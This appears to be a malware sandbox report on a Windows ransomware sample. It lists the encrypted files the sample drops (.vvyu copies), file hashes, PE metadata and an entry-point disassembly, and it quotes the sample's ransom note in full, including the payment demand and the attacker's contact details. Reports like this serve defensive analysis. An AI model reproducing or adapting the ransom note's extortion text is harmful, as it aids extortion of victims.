MD5:	FB2F96A7601DF66AEC92DE652CC76357
SHA1:	DA2C577597E22D5EA732B3AE4109D6E542F87233
SHA-256:	308B59CA73A7A5DEA8A5CEFB3302837F2A71A12D3558C7E4CB000A5E1F1F608E
SHA-512:	BBA516CBCB8D943A9201158F6987F5378266650A95A4FA32D516CF2CDF27EFD23A94365112D9A7310B558284754DD6F1357AD7691C8A25D6A9041EB6EF9FDAD2
Malicious:	false
Preview:	[{000.`.ub...c.Gk@..3....1+n.\|...*L..e..?^...R..a.%.y.2...(C... .>.7...\|...4..i03'{......1y...1.l.=..!I}K7.....,+..H..n}...O..Ra.Ij!.........._.....f=35.v....I,....E.1.....e..T.....8....M...P.K+.M...8...(.&#.......}......Y.. .$.1..u.4...8.`M'..0...U.m..jC....(...#....@..i.d..f.u..a.+Y."5&SNu..~.....>...W.".......2.C...7.X...2..e......o.3L.k...0kP6vOoEdBm9p2ITHS3ppg85iRBRKnEdtqfNfpPA{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

C:\Users\user\Favorites\Google.url

Download File

Process:	C:\Users\user\AppData\Local\134b591f-abb9-4ef9-932a-7c7a6a2cddfe\bE5aaTiJM0.exe
File Type:	data
Category:	dropped
Size (bytes):	445
Entropy (8bit):	7.4024574409402275
Encrypted:	false
SSDEEP:	12:aAgoCYkm/JFtSESwWIhNABj7NMGM7BDpVta6L8hykscii9a:aAgoiW1LdWI7AVF2BorsbD
MD5:	05EF36ACAF6B0788A2B65F7923FA6332
SHA1:	9D95D28459E2B24E418F5B8012B6D00D42CE36A6
SHA-256:	32318828BE462083422B9C1BCDF63FBF271E59963F00030714543932B9263950
SHA-512:	DE006614814F4364F3BEDBB9298F33028822963423FD87071E9FC9D2FBA2043326CFB4A669E5CD4926179BCC7C15846F9EB45CD9B9DAE20E4DDB41320FBA86C7
Malicious:	false
Preview:	[{000...^.......C......?+^.8(.pO..a....OwB....:....A6iI.y......Th=`.3.......aEp._.Q..h..d9...........IZ.R......C.tG.j.tQ..:DL......e3.n..}t...2@...g.x....%Y.m..\Z......~.&.6U..Ki...c$5...i-.PZx@L..O.......s...:[B.oX.d...b.....f.66../.`.[E... -.M.J.=f....<.....a.X.....h.). 4..0..y'.x5.R...(#_.R."....G.8....Fj"..\C.m..%y....<N..e.......1.B......0kP6vOoEdBm9p2ITHS3ppg85iRBRKnEdtqfNfpPA{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

C:\Users\user\Favorites\Google.url.vvyu (copy)

Download File

Process:	C:\Users\user\AppData\Local\134b591f-abb9-4ef9-932a-7c7a6a2cddfe\bE5aaTiJM0.exe
File Type:	data
Category:	dropped
Size (bytes):	445
Entropy (8bit):	7.4024574409402275
Encrypted:	false
SSDEEP:	12:aAgoCYkm/JFtSESwWIhNABj7NMGM7BDpVta6L8hykscii9a:aAgoiW1LdWI7AVF2BorsbD
MD5:	05EF36ACAF6B0788A2B65F7923FA6332
SHA1:	9D95D28459E2B24E418F5B8012B6D00D42CE36A6
SHA-256:	32318828BE462083422B9C1BCDF63FBF271E59963F00030714543932B9263950
SHA-512:	DE006614814F4364F3BEDBB9298F33028822963423FD87071E9FC9D2FBA2043326CFB4A669E5CD4926179BCC7C15846F9EB45CD9B9DAE20E4DDB41320FBA86C7
Malicious:	false
Preview:	[{000...^.......C......?+^.8(.pO..a....OwB....:....A6iI.y......Th=`.3.......aEp._.Q..h..d9...........IZ.R......C.tG.j.tQ..:DL......e3.n..}t...2@...g.x....%Y.m..\Z......~.&.6U..Ki...c$5...i-.PZx@L..O.......s...:[B.oX.d...b.....f.66../.`.[E... -.M.J.=f....<.....a.X.....h.). 4..0..y'.x5.R...(#_.R."....G.8....Fj"..\C.m..%y....<N..e.......1.B......0kP6vOoEdBm9p2ITHS3ppg85iRBRKnEdtqfNfpPA{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

C:\Users\user\Favorites\Live.url

Download File

Process:	C:\Users\user\AppData\Local\134b591f-abb9-4ef9-932a-7c7a6a2cddfe\bE5aaTiJM0.exe
File Type:	data
Category:	dropped
Size (bytes):	443
Entropy (8bit):	7.395076306374279
Encrypted:	false
SSDEEP:	12:DtBDV66IBDhcNjshLunWabzhsY1zkscii9a:DtHnIBdPhDsbD
MD5:	4AB3B0B3C388505FB1BFAD24481B510D
SHA1:	911A343555560C4EE745C04DA1DF75FB9B911684
SHA-256:	03A2AF9C91C86B4743F8B86D9EE090F3A3D4A4918A77EB830AE01B144C9EE479
SHA-512:	56173F0A3591364E9AF13C42347CC9B55072FACCADCCA9C12C8D17DB3E38D46A7E34E775DFC7210F271D001A53E18F06AC0EAD90445F92180746BC18039A5219
Malicious:	false
Preview:	[{000...6@_.sSz.B^-\|.X..2$1Vp.M"...Z3..w.~...u.).H...y......W]....3q......6.]..W@.3.%/2{$G.x..R.t....y....B.....)._......;N.#..`S\.Q..yE:..e.`._...R.Hb....Z#....dp.oME.6..Kg=9.f.b `.m`#.2..{.B_...p.[.a12Y.,...."..A/.CkZ...Z.I.U2.xgpf..0^}qk[.\|(..u.~2P..<..]....X..q.......e........G..1.)...n1.~6._[..:...&.w.J.3...Q.J.>:.*..=.RZ..=k)K...1.....!F...@X0kP6vOoEdBm9p2ITHS3ppg85iRBRKnEdtqfNfpPA{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

C:\Users\user\Favorites\Live.url.vvyu (copy)

Download File

Process:	C:\Users\user\AppData\Local\134b591f-abb9-4ef9-932a-7c7a6a2cddfe\bE5aaTiJM0.exe
File Type:	data
Category:	dropped
Size (bytes):	443
Entropy (8bit):	7.395076306374279
Encrypted:	false
SSDEEP:	12:DtBDV66IBDhcNjshLunWabzhsY1zkscii9a:DtHnIBdPhDsbD
MD5:	4AB3B0B3C388505FB1BFAD24481B510D
SHA1:	911A343555560C4EE745C04DA1DF75FB9B911684
SHA-256:	03A2AF9C91C86B4743F8B86D9EE090F3A3D4A4918A77EB830AE01B144C9EE479
SHA-512:	56173F0A3591364E9AF13C42347CC9B55072FACCADCCA9C12C8D17DB3E38D46A7E34E775DFC7210F271D001A53E18F06AC0EAD90445F92180746BC18039A5219
Malicious:	false
Preview:	[{000...6@_.sSz.B^-\|.X..2$1Vp.M"...Z3..w.~...u.).H...y......W]....3q......6.]..W@.3.%/2{$G.x..R.t....y....B.....)._......;N.#..`S\.Q..yE:..e.`._...R.Hb....Z#....dp.oME.6..Kg=9.f.b `.m`#.2..{.B_...p.[.a12Y.,...."..A/.CkZ...Z.I.U2.xgpf..0^}qk[.\|(..u.~2P..<..]....X..q.......e........G..1.)...n1.~6._[..:...&.w.J.3...Q.J.>:.*..=.RZ..=k)K...1.....!F...@X0kP6vOoEdBm9p2ITHS3ppg85iRBRKnEdtqfNfpPA{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

C:\Users\user\Favorites\NYTimes.url

Download File

Process:	C:\Users\user\AppData\Local\134b591f-abb9-4ef9-932a-7c7a6a2cddfe\bE5aaTiJM0.exe
File Type:	data
Category:	dropped
Size (bytes):	446
Entropy (8bit):	7.435606334371388
Encrypted:	false
SSDEEP:	6:J1L3oWLkNthZZKkuLf5DprNE7YjHvDxUwFWVYy5C6L5ZLemIFoIyockscii96Z:LYMC41flprNE7YjHLfYCcHyn+kscii9a
MD5:	FF0AF379F95A4E6838041A6146AC7ED4
SHA1:	EFB5E41452F5A5BC7912EC6C6F9B4B78987AFFB6
SHA-256:	E898BD3C3A5536B77F0D01881A48A2E2E8E661B2F5BD0D59A9B70036FE71D694
SHA-512:	C29B2F81A3F4C67B4D5007C03412377B29BBD83301BB27F790A477A34A08312FE6A0D434357C971A9CCCEBF410E150C0F7B3B8B7D42BE5DF8435201642C9FDB9
Malicious:	false
Preview:	[{000(k.\|./.........dL.B/=.7\f\| ....U.n..BCm....i,fs.m.H di..l..X.}.....Gt$...).j[x....P........p./...b...\|..D..!'.e.qE.....Q...nW.W..C..V....s_..xUF7g..rG..7#.....hhH.px.9I&..(T...i...,&~.w#^.C.....;.....y.4....b.v\.W;..F.u"1Y..`...:.b....Rp.......I..G.B\..S6......q_...74?.XH.~/.*..fD..6.].NN<..^t. 6..)(.......+.AB"2..;..<.0Wg.].AOUVi..JS..v@...D..O....0kP6vOoEdBm9p2ITHS3ppg85iRBRKnEdtqfNfpPA{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

C:\Users\user\Favorites\NYTimes.url.vvyu (copy)

Download File

Process:	C:\Users\user\AppData\Local\134b591f-abb9-4ef9-932a-7c7a6a2cddfe\bE5aaTiJM0.exe
File Type:	data
Category:	dropped
Size (bytes):	446
Entropy (8bit):	7.435606334371388
Encrypted:	false
SSDEEP:	6:J1L3oWLkNthZZKkuLf5DprNE7YjHvDxUwFWVYy5C6L5ZLemIFoIyockscii96Z:LYMC41flprNE7YjHLfYCcHyn+kscii9a
MD5:	FF0AF379F95A4E6838041A6146AC7ED4
SHA1:	EFB5E41452F5A5BC7912EC6C6F9B4B78987AFFB6
SHA-256:	E898BD3C3A5536B77F0D01881A48A2E2E8E661B2F5BD0D59A9B70036FE71D694
SHA-512:	C29B2F81A3F4C67B4D5007C03412377B29BBD83301BB27F790A477A34A08312FE6A0D434357C971A9CCCEBF410E150C0F7B3B8B7D42BE5DF8435201642C9FDB9
Malicious:	false
Preview:	[{000(k.\|./.........dL.B/=.7\f\| ....U.n..BCm....i,fs.m.H di..l..X.}.....Gt$...).j[x....P........p./...b...\|..D..!'.e.qE.....Q...nW.W..C..V....s_..xUF7g..rG..7#.....hhH.px.9I&..(T...i...,&~.w#^.C.....;.....y.4....b.v\.W;..F.u"1Y..`...:.b....Rp.......I..G.B\..S6......q_...74?.XH.~/.*..fD..6.].NN<..^t. 6..)(.......+.AB"2..;..<.0Wg.].AOUVi..JS..v@...D..O....0kP6vOoEdBm9p2ITHS3ppg85iRBRKnEdtqfNfpPA{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

C:\Users\user\Favorites\Reddit.url

Download File

Process:	C:\Users\user\AppData\Local\134b591f-abb9-4ef9-932a-7c7a6a2cddfe\bE5aaTiJM0.exe
File Type:	data
Category:	dropped
Size (bytes):	445
Entropy (8bit):	7.43338141631657
Encrypted:	false
SSDEEP:	12:Xj8M9+yreH+n+ijPy9AQUnpKSIokkscii9a:z8q1S+nbjiAQwvIoBsbD
MD5:	E5BD11AF9DE03B50C1CD14D355132A5A
SHA1:	E44FCE5F8AF9C7B7FDFFC912A282DA46E8C62EB8
SHA-256:	5E8B78710A4E4769169BA3A3F25229B027AD91DD500C39ABE8A37FAA8D53D8FF
SHA-512:	54ADE7191AC69EE207DD40D603AAE6EE60A001EF4BE692A6075E994B32BE8FECBB01A753EED0958BB0B7DA8688BAA2C5D0A67B308C3F83C6A4F35EA5966499D7
Malicious:	false
Preview:	[{000.......Ma.%.k......+WO&z\|..>...H...K....f.j...6 MDo.....P.[..Up...RH/7h......v0...w.F4...`\.........]. e.T..cq..G>o]..c/ ...\..r.n{.F..9...Az..>....&w.............!_.....h............=..o5...M.4..+..`M(I.o........Fd".....l.....c[Y...JI...O.k..n...)q..^...t"N.%..P.....ek...9X..m. 8....f...&......#t....'RN.H.=u..*.;.+..r..+r....o...g.Uw.........L.,0kP6vOoEdBm9p2ITHS3ppg85iRBRKnEdtqfNfpPA{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

C:\Users\user\Favorites\Reddit.url.vvyu (copy)

Download File

Process:	C:\Users\user\AppData\Local\134b591f-abb9-4ef9-932a-7c7a6a2cddfe\bE5aaTiJM0.exe
File Type:	data
Category:	dropped
Size (bytes):	445
Entropy (8bit):	7.43338141631657
Encrypted:	false
SSDEEP:	12:Xj8M9+yreH+n+ijPy9AQUnpKSIokkscii9a:z8q1S+nbjiAQwvIoBsbD
MD5:	E5BD11AF9DE03B50C1CD14D355132A5A
SHA1:	E44FCE5F8AF9C7B7FDFFC912A282DA46E8C62EB8
SHA-256:	5E8B78710A4E4769169BA3A3F25229B027AD91DD500C39ABE8A37FAA8D53D8FF
SHA-512:	54ADE7191AC69EE207DD40D603AAE6EE60A001EF4BE692A6075E994B32BE8FECBB01A753EED0958BB0B7DA8688BAA2C5D0A67B308C3F83C6A4F35EA5966499D7
Malicious:	false
Preview:	[{000.......Ma.%.k......+WO&z\|..>...H...K....f.j...6 MDo.....P.[..Up...RH/7h......v0...w.F4...`\.........]. e.T..cq..G>o]..c/ ...\..r.n{.F..9...Az..>....&w.............!_.....h............=..o5...M.4..+..`M(I.o........Fd".....l.....c[Y...JI...O.k..n...)q..^...t"N.%..P.....ek...9X..m. 8....f...&......#t....'RN.H.=u..*.;.+..r..+r....o...g.Uw.........L.,0kP6vOoEdBm9p2ITHS3ppg85iRBRKnEdtqfNfpPA{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

C:\Users\user\Favorites\Twitter.url

Download File

Process:	C:\Users\user\AppData\Local\134b591f-abb9-4ef9-932a-7c7a6a2cddfe\bE5aaTiJM0.exe
File Type:	data
Category:	dropped
Size (bytes):	446
Entropy (8bit):	7.445767924002865
Encrypted:	false
SSDEEP:	12:kgHGUSaQ8uPl4UGut371PWEW3oe0Sgz+D9kscii9a:kgHGnJz9U23NG3oer++qsbD
MD5:	3E8D14A128A5953DB558B089DE6C0668
SHA1:	A9E75037E3D6397AF8F24BA5371E2F76A36FC665
SHA-256:	F534E249701054445F47AC389C5A7255338FDC2A1DD2803DFE1902654F9C8C2A
SHA-512:	23779DD2451228237E61A6FB3AE6444A1E12652448A5D36AAFF5D081E0CD63110F4947E9F408C49C46B715B205CB22C3E9C777B86B4DE3AE521651A0624B0B04
Malicious:	false
Preview:	[{000\|....;.....h....i...k..d.O.E.k<..K..........&.!.....\|...6.yix.2..3w.L!...M..g...Y.........w..W.......F+.../P.....!..H/-....M.Uk.....X.."A7.u'.f.d..Zu<.a.w.X.H....K. .5G....s-FZdm..r.x.'...Z....L..q.Z.w.J......5.l.mb.p....%...p..GN....p.../\|`...a....."..`:...7g..8.....:.....Qb.....a..*\...CN.fs}F.<Y..w.`_F.X..Z> l.a.B6...L.........8J.oW@...0kP6vOoEdBm9p2ITHS3ppg85iRBRKnEdtqfNfpPA{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

C:\Users\user\Favorites\Twitter.url.vvyu (copy)

Download File

Process:	C:\Users\user\AppData\Local\134b591f-abb9-4ef9-932a-7c7a6a2cddfe\bE5aaTiJM0.exe
File Type:	data
Category:	dropped
Size (bytes):	446
Entropy (8bit):	7.445767924002865
Encrypted:	false
SSDEEP:	12:kgHGUSaQ8uPl4UGut371PWEW3oe0Sgz+D9kscii9a:kgHGnJz9U23NG3oer++qsbD
MD5:	3E8D14A128A5953DB558B089DE6C0668
SHA1:	A9E75037E3D6397AF8F24BA5371E2F76A36FC665
SHA-256:	F534E249701054445F47AC389C5A7255338FDC2A1DD2803DFE1902654F9C8C2A
SHA-512:	23779DD2451228237E61A6FB3AE6444A1E12652448A5D36AAFF5D081E0CD63110F4947E9F408C49C46B715B205CB22C3E9C777B86B4DE3AE521651A0624B0B04
Malicious:	false
Preview:	[{000\|....;.....h....i...k..d.O.E.k<..K..........&.!.....\|...6.yix.2..3w.L!...M..g...Y.........w..W.......F+.../P.....!..H/-....M.Uk.....X.."A7.u'.f.d..Zu<.a.w.X.H....K. .5G....s-FZdm..r.x.'...Z....L..q.Z.w.J......5.l.mb.p....%...p..GN....p.../\|`...a....."..`:...7g..8.....:.....Qb.....a..*\...CN.fs}F.<Y..w.`_F.X..Z> l.a.B6...L.........8J.oW@...0kP6vOoEdBm9p2ITHS3ppg85iRBRKnEdtqfNfpPA{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

C:\Users\user\Favorites\Wikipedia.url

Download File

Process:	C:\Users\user\AppData\Local\134b591f-abb9-4ef9-932a-7c7a6a2cddfe\bE5aaTiJM0.exe
File Type:	data
Category:	dropped
Size (bytes):	448
Entropy (8bit):	7.444929720191598
Encrypted:	false
SSDEEP:	12:l88pR2P9WT/iObxse/SrhsjtErJX2ykscii9a:l88pR2IDiGx9ohFrJssbD
MD5:	EA93EAA53F7452DCD8491B798FA01A84
SHA1:	3572AB8C4B370A0E065F5762A7FA81EAA75EAA12
SHA-256:	E320B41911571A86C868B62F347D754229194DAC2B08AF0A74D15FA013B3F108
SHA-512:	A2A6D70F711FE271355E5A78B6890FDCF899415F519CE7004CBB838957D578851745E8530A709C672EA72244B1F0498625798B90ECD3ADCB5A8CE2416B448A53
Malicious:	false
Preview:	[{000....s.)Y.~e...y.u...R.:K...<.&..H.9j...v..~ %.L.g.m.:@1a....p\|.H...p.S...n.,e.q.!:)F...d......zj....c-25'fvS.9....B*$...xa...zU9...Q.?.-....X..0.'....X.K".#C(1.5...t.......ls............\|.....a'.L...0.t...At...-.....I.e]..'.LC....<..Qr.'Q.. sF.g..@.t....G......K....M.?......t.g<$.....,J.......b..PAV....4.O.c..3.([.G..........Z.kc[..X.s..7uly.....0kP6vOoEdBm9p2ITHS3ppg85iRBRKnEdtqfNfpPA{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

C:\Users\user\Favorites\Wikipedia.url.vvyu (copy)

Download File

Process:	C:\Users\user\AppData\Local\134b591f-abb9-4ef9-932a-7c7a6a2cddfe\bE5aaTiJM0.exe
File Type:	data
Category:	dropped
Size (bytes):	448
Entropy (8bit):	7.444929720191598
Encrypted:	false
SSDEEP:	12:l88pR2P9WT/iObxse/SrhsjtErJX2ykscii9a:l88pR2IDiGx9ohFrJssbD
MD5:	EA93EAA53F7452DCD8491B798FA01A84
SHA1:	3572AB8C4B370A0E065F5762A7FA81EAA75EAA12
SHA-256:	E320B41911571A86C868B62F347D754229194DAC2B08AF0A74D15FA013B3F108
SHA-512:	A2A6D70F711FE271355E5A78B6890FDCF899415F519CE7004CBB838957D578851745E8530A709C672EA72244B1F0498625798B90ECD3ADCB5A8CE2416B448A53
Malicious:	false
Preview:	[{000....s.)Y.~e...y.u...R.:K...<.&..H.9j...v..~ %.L.g.m.:@1a....p\|.H...p.S...n.,e.q.!:)F...d......zj....c-25'fvS.9....B*$...xa...zU9...Q.?.-....X..0.'....X.K".#C(1.5...t.......ls............\|.....a'.L...0.t...At...-.....I.e]..'.LC....<..Qr.'Q.. sF.g..@.t....G......K....M.?......t.g<$.....,J.......b..PAV....4.O.c..3.([.G..........Z.kc[..X.s..7uly.....0kP6vOoEdBm9p2ITHS3ppg85iRBRKnEdtqfNfpPA{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

C:\Users\user\Favorites\Youtube.url

Download File

Process:	C:\Users\user\AppData\Local\134b591f-abb9-4ef9-932a-7c7a6a2cddfe\bE5aaTiJM0.exe
File Type:	data
Category:	dropped
Size (bytes):	446
Entropy (8bit):	7.4246413037902315
Encrypted:	false
SSDEEP:	12:RMz2Cg1fuNqfSAlngnVrYZO3f8wTAn3DvE4kscii9a:mzHgcNqzno6OvXUn3AdsbD
MD5:	B7FAA7804B39469FB9DC5D578C7BABFD
SHA1:	31D5CA1715F585B33FCB25A65A78C742908D3BD3
SHA-256:	0E91184314615384D0E144FCDAD6C371473B826837C8BEA7D44020B210F8EF6B
SHA-512:	11828DB1D34E108D434159C7270FBA805E0CF0422DABA09E1789B9BB4095D8C998B3B5D4FC5562B2B5C7A7F66B08D95399D42866F34BA50B230406BC65B2A073
Malicious:	false
Preview:	[{000*o...q..rv.....l[..$v..$.jr..U...d"....&`w...Uu.G6..o./..>.?......"7'jQ.^....bx....p....JM..].....-..W.GVj.....56...-B...h..D...U9.Qi...t.q.:.o...:0..[."J....M.L.-zs.g.....RBN.Iq......Ejb.}2j.}x..\X..0..y..}1f...J...h...c..........J.3....L..\|..."1$...C.u....ub.h...OY..W...G..Z...o.Ff.}+......bngLK..M.....k.....6y"E....E..m.%=....{7..j...e..........LA..0kP6vOoEdBm9p2ITHS3ppg85iRBRKnEdtqfNfpPA{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

C:\Users\user\Favorites\Youtube.url.vvyu (copy)

Download File

Process:	C:\Users\user\AppData\Local\134b591f-abb9-4ef9-932a-7c7a6a2cddfe\bE5aaTiJM0.exe
File Type:	data
Category:	dropped
Size (bytes):	446
Entropy (8bit):	7.4246413037902315
Encrypted:	false
SSDEEP:	12:RMz2Cg1fuNqfSAlngnVrYZO3f8wTAn3DvE4kscii9a:mzHgcNqzno6OvXUn3AdsbD
MD5:	B7FAA7804B39469FB9DC5D578C7BABFD
SHA1:	31D5CA1715F585B33FCB25A65A78C742908D3BD3
SHA-256:	0E91184314615384D0E144FCDAD6C371473B826837C8BEA7D44020B210F8EF6B
SHA-512:	11828DB1D34E108D434159C7270FBA805E0CF0422DABA09E1789B9BB4095D8C998B3B5D4FC5562B2B5C7A7F66B08D95399D42866F34BA50B230406BC65B2A073
Malicious:	false
Preview:	[{000*o...q..rv.....l[..$v..$.jr..U...d"....&`w...Uu.G6..o./..>.?......"7'jQ.^....bx....p....JM..].....-..W.GVj.....56...-B...h..D...U9.Qi...t.q.:.o...:0..[."J....M.L.-zs.g.....RBN.Iq......Ejb.}2j.}x..\X..0..y..}1f...J...h...c..........J.3....L..\|..."1$...C.u....ub.h...OY..W...G..Z...o.Ff.}+......bngLK..M.....k.....6y"E....E..m.%=....{7..j...e..........LA..0kP6vOoEdBm9p2ITHS3ppg85iRBRKnEdtqfNfpPA{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

C:\Users\user\_readme.txt

Download File

Process:	C:\Users\user\AppData\Local\134b591f-abb9-4ef9-932a-7c7a6a2cddfe\bE5aaTiJM0.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1116
Entropy (8bit):	4.862226211132582
Encrypted:	false
SSDEEP:	24:FS5ZHPnIekFQjhRe9bgnYLuWyJmFRqrl3W4kA+GT/kF5M2/k1QX6RKTJe4:WZHfv0p6WyJPFWrDGT0f/kaXZx
MD5:	06659F4E86D452FDFC033CA033D99967
SHA1:	688415EAA260FC4EFFAB85299205BDAF560FBE9D
SHA-256:	A4D9B2453B597D31DD620E5249E801C0ADEF69925C193411FBEDAE35C2294AC2
SHA-512:	482C5CF017BD71AFC7B1570B0158F84F9B12F6D86F82B528C43AA1D7AB22F7AFBFC3E93FC700FAE34300B6CD09F42E2ED6354C4DD9977259A0A93225910E2421
Malicious:	false
Preview:	ATTENTION!....Don't worry, you can return all your files!..All your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key...The only method of recovering files is to purchase decrypt tool and unique key for you...This software will decrypt all your encrypted files...What guarantees you have?..You can send one of your encrypted file from your PC and we decrypt it for free...But we can decrypt only 1 file for free. File must not contain valuable information...You can get and look video overview decrypt tool:..https://we.tl/t-QsoSRIeAK6..Price of private key and decrypt software is $980...Discount 50% available if you contact us first 72 hours, that's price for you is $490...Please note that you'll never restore your data without payment...Check your e-mail "Spam" or "Junk" folder if you don't get answer more than 6 hours.......To get this software you need write on our e-mail:..support@bestyourmail.ch....Reserve e-mail addres

C:\_readme.txt

Download File

Process:	C:\Users\user\AppData\Local\134b591f-abb9-4ef9-932a-7c7a6a2cddfe\bE5aaTiJM0.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1116
Entropy (8bit):	4.862226211132582
Encrypted:	false
SSDEEP:	24:FS5ZHPnIekFQjhRe9bgnYLuWyJmFRqrl3W4kA+GT/kF5M2/k1QX6RKTJe4:WZHfv0p6WyJPFWrDGT0f/kaXZx
MD5:	06659F4E86D452FDFC033CA033D99967
SHA1:	688415EAA260FC4EFFAB85299205BDAF560FBE9D
SHA-256:	A4D9B2453B597D31DD620E5249E801C0ADEF69925C193411FBEDAE35C2294AC2
SHA-512:	482C5CF017BD71AFC7B1570B0158F84F9B12F6D86F82B528C43AA1D7AB22F7AFBFC3E93FC700FAE34300B6CD09F42E2ED6354C4DD9977259A0A93225910E2421
Malicious:	true
Preview:	ATTENTION!....Don't worry, you can return all your files!..All your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key...The only method of recovering files is to purchase decrypt tool and unique key for you...This software will decrypt all your encrypted files...What guarantees you have?..You can send one of your encrypted file from your PC and we decrypt it for free...But we can decrypt only 1 file for free. File must not contain valuable information...You can get and look video overview decrypt tool:..https://we.tl/t-QsoSRIeAK6..Price of private key and decrypt software is $980...Discount 50% available if you contact us first 72 hours, that's price for you is $490...Please note that you'll never restore your data without payment...Check your e-mail "Spam" or "Junk" folder if you don't get answer more than 6 hours.......To get this software you need write on our e-mail:..support@bestyourmail.ch....Reserve e-mail addres

C:\bootTel.dat

Download File

Process:	C:\Users\user\AppData\Local\134b591f-abb9-4ef9-932a-7c7a6a2cddfe\bE5aaTiJM0.exe
File Type:	data
Category:	dropped
Size (bytes):	414
Entropy (8bit):	7.320599052207444
Encrypted:	false
SSDEEP:	12:VhatxK3GN32CvWEbYu/IGvsiT5Kbkscii9a:+e3k2CvWE//FvsilKwsbD
MD5:	DE939E7C4676D837DADCA74CBF6DAF36
SHA1:	A7C2E9E7C087823FDD3084265C21566C48910946
SHA-256:	11AE8744555A18E38B54522EEFF1A024A90DAC9A29D2D800699D99F1F7CEA5A4
SHA-512:	BC1F99EF89710195316127A650E3DA3A0A67E30A13E8EA888482A95B26393A8705839BFFB88B7294E43831AA2C3BCFD4FAE0041939978BB2AADC0B10C54396BD
Malicious:	false
Preview:	P.....\|......m.A().....Q3~%..:.o..!..3W.....,R.*H`..C.k..O.7...G..Ex..3..G...7.d.S/...>.....o.^.A...F.....5{..n.l.m.s.7z..."/.S...p.a.D..hZw..q$...n..4v....:...I.].h..t.x.m3jf..6.K.".D...ri...S._.e\..W#x...Q.k..+41~.:.._@.&..nI0.]'..O....4....vr.O..h...h..?X.u}.P..`...2}z.{.....r5.6......4)..{T.,.e\|.B...._.......t.$Q.=0kP6vOoEdBm9p2ITHS3ppg85iRBRKnEdtqfNfpPA{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

C:\bootTel.dat.vvyu (copy)

Download File

Process:	C:\Users\user\AppData\Local\134b591f-abb9-4ef9-932a-7c7a6a2cddfe\bE5aaTiJM0.exe
File Type:	data
Category:	dropped
Size (bytes):	414
Entropy (8bit):	7.320599052207444
Encrypted:	false
SSDEEP:	12:VhatxK3GN32CvWEbYu/IGvsiT5Kbkscii9a:+e3k2CvWE//FvsilKwsbD
MD5:	DE939E7C4676D837DADCA74CBF6DAF36
SHA1:	A7C2E9E7C087823FDD3084265C21566C48910946
SHA-256:	11AE8744555A18E38B54522EEFF1A024A90DAC9A29D2D800699D99F1F7CEA5A4
SHA-512:	BC1F99EF89710195316127A650E3DA3A0A67E30A13E8EA888482A95B26393A8705839BFFB88B7294E43831AA2C3BCFD4FAE0041939978BB2AADC0B10C54396BD
Malicious:	false
Preview:	P.....\|......m.A().....Q3~%..:.o..!..3W.....,R.*H`..C.k..O.7...G..Ex..3..G...7.d.S/...>.....o.^.A...F.....5{..n.l.m.s.7z..."/.S...p.a.D..hZw..q$...n..4v....:...I.].h..t.x.m3jf..6.K.".D...ri...S._.e\..W#x...Q.k..+41~.:.._@.&..nI0.]'..O....4....vr.O..h...h..?X.u}.P..`...2}z.{.....r5.6......4)..{T.,.e\|.B...._.......t.$Q.=0kP6vOoEdBm9p2ITHS3ppg85iRBRKnEdtqfNfpPA{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.842662742823055
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	bE5aaTiJM0.exe
File size:	747520
MD5:	5fae11a9ddb49452b6896fd3217e9665
SHA1:	a642378099d0ac4e1dc3e0abe98b12bee1992e1d
SHA256:	12471d61dc844208bdbe23a9749980cf1a40ad45f844449afe55fb0f1cbbda0b
SHA512:	8244571ab072b89fe10c6c8a78b0f3b62c6833054d40b327c51583cc247d1e13f8dbf4e8367ce3672a5c5c14de8b53fcc7969bb6d78f4232ebebe77d460768ac
SSDEEP:	12288:nCqmkJm0QpmFRBBAw356C94EnhtoLWBEmlCW85h1bmyA5qKyr3ty+SqOhUII84ko:n410QpmfBB5UEnhtjroWW/Hro+TICktO
TLSH:	C2F41230B680E433D06791309564CFAD1B7EB912163189C7B7A42B3E6E763C26B25B5F
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........ADS. .. .. ..V... ..V... ..X... .. +.` ..V... ..V... ..V... .Rich. *.........................PE..L..."V.`...........

File Icon


Icon Hash:	8a9199a9ca8ed2f2

Static PE Info

General

Entrypoint:	0x498440
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	NX_COMPAT, TERMINAL_SERVER_AWARE
Time Stamp:	0x609B5622 [Wed May 12 04:14:26 2021 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	1
File Version Major:	5
File Version Minor:	1
Subsystem Version Major:	5
Subsystem Version Minor:	1
Import Hash:	fcbdb87c73dba6603c8b6aba49ea683b

Entrypoint Preview

Instruction
call 00007FF04CA8DB4Bh
jmp 00007FF04CA8717Eh
int3
int3
int3
int3
int3
int3
call 00007FF04CA8732Ch
xchg cl, ch
jmp 00007FF04CA87314h
call 00007FF04CA87323h
fxch st(0), st(1)
jmp 00007FF04CA8730Bh
fabs
fld1
mov ch, cl
xor cl, cl
jmp 00007FF04CA87301h
